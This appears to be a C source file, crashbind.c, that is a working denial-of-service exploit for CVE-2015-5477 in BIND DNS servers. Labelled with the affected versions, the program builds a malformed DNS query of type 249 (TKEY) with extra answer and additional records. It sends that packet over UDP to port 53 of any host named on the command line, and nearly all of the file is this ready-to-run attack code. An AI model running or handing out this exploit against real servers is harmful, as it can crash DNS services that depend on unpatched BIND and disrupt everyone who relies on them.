crashbind.c

1. // crashbind.c
2. // CVE-2015-5477
3. // Versions Affected: 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2
4.  
5. #include <stdio.h>
6. #include <stdlib.h>
7. #include <stdint.h>
8. #include <unistd.h>
9. #include <time.h>
10. #include <errno.h>
11. #include <string.h>
12.  
13. #include <netdb.h>
14. #include <sys/types.h>
15. #include <sys/socket.h>
16. #include <netinet/in.h>
17. #include <arpa/inet.h>
18.  
19. struct DNS_HEADER
20. {
21.     unsigned short id;
22.  
23.     unsigned char rd :1;
24.     unsigned char tc :1;
25.     unsigned char aa :1;
26.     unsigned char opcode :4;
27.     unsigned char qr :1;
28.  
29.     unsigned char rcode :4;
30.     unsigned char cd :1;
31.     unsigned char ad :1;
32.     unsigned char z :1;
33.     unsigned char ra :1;
34.  
35.     unsigned short q_count;
36.     unsigned short ans_count;
37.     unsigned short auth_count;
38.     unsigned short add_count;
39. } __attribute__((packed));
40.  
41. struct DNS_QUESTION
42. {
43.     char qname[12];
44.     uint16_t qtype;
45.     uint16_t qclass;
46. } __attribute__((packed));
47.  
48. struct DNS_ANSWER
49. {
50.     char name[12];
51.     uint16_t type;
52.     uint16_t class;
53.     uint32_t ttl;
54.     uint16_t rdlength; // Set to 4
55.     uint8_t data[4];
56. } __attribute__((packed));
57.  
58. struct mal_query {
59.     struct DNS_HEADER header;
60.     struct DNS_QUESTION question;
61.     struct DNS_ANSWER answer[2];
62. } __attribute__((packed));
63.  
64.  
65. int
66. main(int argc, char **argv)
67. {
68.     int fd = 0;
69.     struct addrinfo hints, *servinfo;
70.     int rv = -1;
71.     struct mal_query mq;
72.  
73.     srand(time(0));
74.  
75.     memset(&hints, 0x0, sizeof(hints));
76.     hints.ai_family = AF_UNSPEC;
77.     hints.ai_socktype = SOCK_DGRAM;
78.  
79.     if ((rv = getaddrinfo(argv[1], "53", &hints, &servinfo)) != 0) {
80.         fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rv));
81.         exit(EXIT_FAILURE);
82.     }
83.  
84.     /* Note: if the hostname has a v6 address and the server isn't listening on
85.      * it, it will fail to connect */
86.     if ((fd = socket(servinfo->ai_family, servinfo->ai_socktype, servinfo->ai_protocol)) < 0) {
87.         perror("socket");
88.         exit(EXIT_FAILURE);
89.     }
90.  
91.     memset(&mq, 0x0, sizeof(mq));
92.  
93.     /* Header */
94.     mq.header.id = htons((uint16_t)rand());
95.     mq.header.rd = 1;
96.     mq.header.opcode = 0x0;
97.     mq.header.qr = 0;
98.     mq.header.q_count = htons(1);
99.     mq.header.ans_count = htons(1);
100.     mq.header.add_count = htons(1);
101.  
102.     /* Question */
103.     strcpy(mq.question.qname, "\x06google\x03\x63om");
104.     mq.question.qtype = htons(249);
105.     mq.question.qclass = htons(0x1);
106.  
107.     /* Answer */
108.     strcpy(mq.answer[0].name, "\x06google\x03\x63om");
109.     mq.answer[0].type = htons(0x0001);
110.     mq.answer[0].class = htons(0x0001);
111.     mq.answer[0].rdlength = htons(4);
112.  
113.     /* Additional */
114.     strcpy(mq.answer[1].name, "\x06google\x03\x63om");
115.     mq.answer[1].type = htons(0x0001);
116.     mq.answer[1].class = htons(0x0001);
117.     mq.answer[1].rdlength = htons(4);
118.  
119.     if (sendto(fd, &mq, sizeof(mq), 0, servinfo->ai_addr, servinfo->ai_addrlen) < 0) {
120.         perror("sendto");
121.         exit(EXIT_FAILURE);
122.     }
123.    
124.  
125.     freeaddrinfo(servinfo);
126.  
127.     return EXIT_SUCCESS;
128. }